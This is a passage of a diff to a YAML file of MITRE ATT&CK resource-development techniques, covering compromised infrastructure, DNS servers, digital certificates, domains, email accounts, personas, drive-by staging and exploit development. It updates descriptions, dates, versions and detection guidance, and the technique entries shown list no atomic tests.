cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. + Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) id: attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9 @@ -50341,7 +53150,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:03:23.937Z' + modified: '2021-04-15T03:04:40.423Z' created: '2020-10-01T00:36:30.759Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -50367,7 +53176,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DNS Server description: |- - Before compromising a victim, adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. + Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019) id: attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81 @@ -50375,7 +53184,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-19T00:11:26.376Z' + modified: '2021-04-15T02:49:49.702Z' created: '2020-10-01T00:40:45.279Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50414,7 +53223,7 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 description: |- - Before compromising a victim, adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. + Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) name: DNS Server @@ -50423,7 +53232,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-19T01:22:53.922Z' + modified: '2021-04-15T03:01:54.609Z' created: '2020-10-01T00:54:30.869Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50462,7 +53271,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Develop Capabilities description: |- - Before compromising a victim, adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020) + Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020) As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability. id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf @@ -50470,7 +53279,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:18:08.552Z' + modified: '2021-04-15T03:08:33.511Z' created: '2020-10-01T01:30:00.877Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50496,23 +53305,23 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Digital Certificates description: |- - Before compromising a victim, adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). + Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). - Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). + Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). + + After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control. id: attack-pattern--1cec9319-743b-4840-bb65-431547bce82a type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:18:08.422Z' + modified: '2021-04-15T02:33:38.589Z' created: '2020-10-01T01:42:24.974Z' - x_mitre_data_sources: - - SSL/TLS certificates x_mitre_detection: |- Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE @@ -50544,33 +53353,48 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Digital Certificates description: |- - Before compromising a victim, adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. + Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. - Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) + Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ) - Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. + After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control. id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:18:54.959Z' + modified: '2021-04-15T02:32:49.507Z' created: '2020-10-01T02:14:18.044Z' - x_mitre_data_sources: - - SSL/TLS certificates x_mitre_detection: |- Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE atomic_tests: [] T1583.001: technique: + created: '2020-09-30T17:09:31.878Z' + modified: '2021-04-15T02:50:38.792Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3 + description: |- + Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. + + Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) + + Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) + name: Domains + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1583.001 @@ -50599,37 +53423,18 @@ resource-development: description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. source_name: Mandiant APT1 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domains - description: |- - Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. - - Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) - - Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) - id: attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-20T20:25:29.310Z' - created: '2020-09-30T17:09:31.878Z' - x_mitre_contributors: - - Wes Hurd - - Vinayak Wadhwa, Lucideus - - Deloitte Threat Library Team - x_mitre_data_sources: - - Domain registration + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: |- Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE + x_mitre_contributors: + - Wes Hurd + - Vinayak Wadhwa, Lucideus + - Deloitte Threat Library Team atomic_tests: [] T1584.001: technique: @@ -50651,7 +53456,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Domains description: |- - Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. + Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) id: attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba @@ -50659,7 +53464,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-19T01:28:56.664Z' + modified: '2021-04-15T03:02:43.030Z' created: '2020-10-01T00:51:28.513Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50670,6 +53475,54 @@ resource-development: x_mitre_platforms: - PRE atomic_tests: [] + T1608.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.004 + url: https://attack.mitre.org/techniques/T1608/004 + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: Gallagher 2015 + description: Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking + group hacked 100+ websites to use as “watering holes”. Retrieved January + 25, 2016. + url: http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Drive-by Target + description: |- + Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). + + Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) + + Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. + + Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). + id: attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-27T17:52:55.302Z' + created: '2021-03-17T20:33:20.127Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on other phases of the adversary lifecycle, such as + [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation + for Client Execution](https://attack.mitre.org/techniques/T1203). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] T1585.002: technique: external_references: @@ -50689,7 +53542,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Email Accounts description: |- - Before compromising a victim, adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) + Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) id: attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a @@ -50697,7 +53550,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-14T00:48:47.515Z' + modified: '2021-04-15T03:09:59.862Z' created: '2020-10-01T01:09:53.217Z' x_mitre_detection: 'Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50723,7 +53576,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Email Accounts description: |- - Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). + Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. @@ -50733,7 +53586,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T16:40:58.761Z' + modified: '2021-04-15T02:57:25.544Z' created: '2020-10-01T01:20:53.104Z' x_mitre_detection: 'Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50767,9 +53620,9 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Establish Accounts description: |- - Before compromising a victim, adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) - For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) id: attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8 @@ -50777,21 +53630,36 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:20:40.675Z' + modified: '2021-04-15T03:10:35.877Z' created: '2020-10-01T01:05:42.216Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_detection: |- Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - PRE atomic_tests: [] T1587.004: technique: + created: '2020-10-01T01:48:15.511Z' + modified: '2021-04-15T03:07:53.803Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2 + description: |- + Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017) + + As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit. + + Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). + name: Exploits + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1587.004 @@ -50805,23 +53673,10 @@ resource-development: url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Exploits - description: |- - Before compromising a victim, adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017) - - As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit. - - Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing 